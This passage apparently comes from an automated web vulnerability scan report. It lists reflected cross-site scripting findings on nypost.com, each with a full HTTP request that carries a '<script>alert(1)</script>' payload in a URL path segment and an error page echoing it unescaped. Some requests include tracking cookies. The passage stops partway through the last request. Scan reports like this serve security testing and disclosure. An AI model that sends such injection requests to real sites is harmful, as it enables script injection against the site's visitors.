1.294. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d8352<script>alert(1)</script>5bc81b9bd20 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortald8352<script>alert(1)</script>5bc81b9bd20/nypost/blocks/story_lists/story_lists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:30 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortald8352<script>alert(1)</script>5bc81b9bd20/nypost/blocks/story_lists/story_lists.css</p>
...[SNIP]...

1.295. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e9bf<script>alert(1)</script>d6a4a30d1e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost2e9bf<script>alert(1)</script>d6a4a30d1e3/blocks/story_lists/story_lists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost2e9bf<script>alert(1)</script>d6a4a30d1e3/blocks/story_lists/story_lists.css</p>
...[SNIP]...

1.296. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d6ece<script>alert(1)</script>9658352bd9c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksd6ece<script>alert(1)</script>9658352bd9c/story_lists/story_lists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksd6ece<script>alert(1)</script>9658352bd9c/story_lists/story_lists.css</p>
...[SNIP]...

1.297. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 16cf3<script>alert(1)</script>e7fb60b6fe1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/story_lists16cf3<script>alert(1)</script>e7fb60b6fe1/story_lists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/story_lists16cf3<script>alert(1)</script>e7fb60b6fe1/story_lists.css</p>
...[SNIP]...

1.298. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 13595<script>alert(1)</script>a60d047bf8f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css13595<script>alert(1)</script>a60d047bf8f HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.css13595<script>alert(1)</script>a60d047bf8f</p>
...[SNIP]...

1.299. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca9a2<script>alert(1)</script>89ade525ba6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigca9a2<script>alert(1)</script>89ade525ba6/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 728
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 05:44:54 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigca9a2<script>alert(1)</script>89ade525ba6/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css</p>
...[SNIP]...

1.300. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d1f8<script>alert(1)</script>bd952773cbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal4d1f8<script>alert(1)</script>bd952773cbe/nypost/blocks/story_tabs/story_tabs_ie.css HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 728
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 05:44:57 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal4d1f8<script>alert(1)</script>bd952773cbe/nypost/blocks/story_tabs/story_tabs_ie.css</p>
...[SNIP]...

1.301. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 36a8b<script>alert(1)</script>1f34a8357cb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost36a8b<script>alert(1)</script>1f34a8357cb/blocks/story_tabs/story_tabs_ie.css HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 728
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 05:45:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost36a8b<script>alert(1)</script>1f34a8357cb/blocks/story_tabs/story_tabs_ie.css</p>
...[SNIP]...

1.302. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/story_tabs/story_tabs_ie.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ddeb2<script>alert(1)</script>f821da0b4eb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksddeb2<script>alert(1)</script>f821da0b4eb/story_tabs/story_tabs_ie.css HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; tracklink=; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.4.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 728
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 05:45:06 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksddeb2<script>alert(1)</script>f821da0b4eb/story_tabs/story_tabs_ie.css</p>
...[SNIP]...

1.303. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bc16<script>alert(1)</script>d5b81a09fe0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig2bc16<script>alert(1)</script>d5b81a09fe0/WebPortal/nypost/blocks/todays_cover/todays_cover.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig2bc16<script>alert(1)</script>d5b81a09fe0/WebPortal/nypost/blocks/todays_cover/todays_cover.css</p>
...[SNIP]...

1.304. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17aa5<script>alert(1)</script>038c8e8a38c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal17aa5<script>alert(1)</script>038c8e8a38c/nypost/blocks/todays_cover/todays_cover.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal17aa5<script>alert(1)</script>038c8e8a38c/nypost/blocks/todays_cover/todays_cover.css</p>
...[SNIP]...

1.305. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 300d9<script>alert(1)</script>de65da3d22 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost300d9<script>alert(1)</script>de65da3d22/blocks/todays_cover/todays_cover.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 728
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:12 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost300d9<script>alert(1)</script>de65da3d22/blocks/todays_cover/todays_cover.css</p>
...[SNIP]...

1.306. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f8df<script>alert(1)</script>5e232f0ad2b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks5f8df<script>alert(1)</script>5e232f0ad2b/todays_cover/todays_cover.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks5f8df<script>alert(1)</script>5e232f0ad2b/todays_cover/todays_cover.css</p>
...[SNIP]...

1.307. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 67d41<script>alert(1)</script>4095da2a068 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover67d41<script>alert(1)</script>4095da2a068/todays_cover.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover67d41<script>alert(1)</script>4095da2a068/todays_cover.css</p>
...[SNIP]...

1.308. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 55d7e<script>alert(1)</script>2f392b5bc5e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css55d7e<script>alert(1)</script>2f392b5bc5e HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/todays_cover/todays_cover.css55d7e<script>alert(1)</script>2f392b5bc5e</p>
...[SNIP]...

1.309. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2e782<script>alert(1)</script>947df1f99ad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig2e782<script>alert(1)</script>947df1f99ad/WebPortal/nypost/blocks/top_story/default_photo.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig2e782<script>alert(1)</script>947df1f99ad/WebPortal/nypost/blocks/top_story/default_photo.css</p>
...[SNIP]...

1.310. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d71d<script>alert(1)</script>21e0f9d741 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal5d71d<script>alert(1)</script>21e0f9d741/nypost/blocks/top_story/default_photo.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 726
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal5d71d<script>alert(1)</script>21e0f9d741/nypost/blocks/top_story/default_photo.css</p>
...[SNIP]...

1.311. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/top_story/default_photo.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2150d<script>alert(1)</script>094611fd17a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost2150d<script>alert(1)</script>094611fd17a/blocks/top_story/default_photo.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
